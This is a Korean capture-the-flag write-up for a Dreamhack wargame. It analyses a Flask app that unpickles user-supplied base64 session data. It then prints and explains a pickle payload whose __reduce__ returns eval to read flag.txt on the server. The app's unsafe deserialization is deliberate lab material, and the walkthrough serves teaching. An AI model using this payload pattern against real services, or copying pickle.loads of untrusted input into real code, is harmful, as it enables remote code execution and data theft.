[Dreamhack] Web-Deserialize-Python 드림핵 워게임 문제 풀이

🐦 Web-Deserialize-Python 드림핵 워게임 문제 풀이

1.  문제에 대한 설명을 읽은 후 문제 파일 다운로드

2.  다운받은 app.py 파일 오픈 후 코드 분석

2 - 1.  필요한 프레임워크와 모듈 가져오기

#!/usr/bin/env python3

from flask import Flask, request, render_template, redirect
import os, pickle, base64

 

코드	설명
Flask 프레임워크	웹 어플리케이션 개발 및 실행에 필요
OS 모듈	운영체제 관련 기능 수행
Pickle	Python 객체 직렬화 & 역질렬화
Base64	데이터의 Base64 형식 인코딩 & 디코딩

---

2 - 2.  Flask 어플리케이션 및 시크릿 키 생성

app = Flask(__name__)
app.secret_key = os.urandom(32)

---

2 - 3.  flag.txt 파일을 오픈한 후, 내용을 읽어와 FLAG 변수에 값 저장

try:
    FLAG = open('./flag.txt', 'r').read() # Flag is here!!
except:
    FLAG = '[**FLAG**]'

 

파일이 존재할 경우	파일이 존재하지 않는 경우
해당 내용을 FLAG 변수에 저장	FLAG 변수에 임의의 FLAG값 할당

---

2 - 4.  세션 정보로 사용할 키 이름들을 INFO 리스트에 저장

INFO = ['name', 'userid', 'password']

---

2 - 5.  루트 경로('/')로 접속했을 때, index.html 템플릿을 렌더링하여 반환

@app.route('/')
def index():
    return render_template('index.html')

---

2 - 6.  요청 형식에 따라 아래 작업 수행

@app.route('/create_session', methods=['GET', 'POST'])
def create_session():
    if request.method == 'GET':
        return render_template('create_session.html')
    elif request.method == 'POST':
        info = {}
        for _ in INFO:
            info[_] = request.form.get(_, '')
        data = base64.b64encode(pickle.dumps(info)).decode('utf8')
        return render_template('create_session.html', data=data)

 

GET	POST
'create_session.html' 템플릿을 렌더링해서 반환	Base64 인코딩 결과를 'create_session.html' 템플릿에 전달

---

2 - 7.  요청 형식에 따라 데이터 처리

@app.route('/check_session', methods=['GET', 'POST'])
def check_session():
    if request.method == 'GET':
        return render_template('check_session.html')
    elif request.method == 'POST':
        session = request.form.get('session', '')
        info = pickle.loads(base64.b64decode(session))
        return render_template('check_session.html', info=info)

 

GET	POST
'check_session.html' 템플릿을 렌더링해서 반환	폼에서 제출된 세션 데이터를 받아와 역직렬화 ⬇️ 'check_session.html' 템플릿에 정보로 전달

---

2 - 8.  Flask 앱을 실행하여 외부 접속 허용

app.run(host='0.0.0.0', port=8000)

3.  서버 생성 후 Create Session 클릭

4.  입력란에 모두 test1 을 작성하고 Create 클릭  -->  인코딩된 세션이 생성됨을 확인

5.  Check Session 페이지로 이동하여 이전에 생성한 값 입력  -->  계정 정보가 복호화된 것을 확인

6.  Flag.txt 파일을 읽어오기 위한 스크립트 사용

import pickle, base64

class test:
    def __reduce__(self):
        p="open('./flag.txt').read()"
        return (eval,(p,))
 
rs={'name':test()}
 
print(base64.b64encode(pickle.dumps(rs)).decode('utf8'))

 

스크립트 출처: https://mokpo.tistory.com/156

 

---

 

① import pickle, base64

파이썬 표준 라이브러리에서 `pickle`과 `base64` 모듈 임포트

② class test

`test`라는 이름의 클래스 정의

③ def __reduce__(self)

객체의 상태를 복원하는 reduce 메서드 정의

④ p="open('./flag.txt').read()"

파일 시스템에서 `flag.txt` 파일의 내용을 읽어오기

⑤ return (eval,(p,))

결과값을 eval() 함수와 함께 튜플 형태로 반환

⑥ rs={'name':test()}

`test` 클래스의 인스턴스를 `rs` 딕셔너리에 `'name'`이라는 키로 저장

⑦ print(base64.b64encode(pickle.dumps(rs)).decode('utf8'))

pickle.dumps() 함수를 사용하여 `rs` 딕셔너리를 직렬화하고, 그 결과를 `base64.b64encode` 함수를 통해 Base64로 인코딩

7.  스크립트를 실행한 후, 결과값을 Session Check 입력란에 작성

8.  입력 후 Check 클릭  -->  FLAG 확인 가능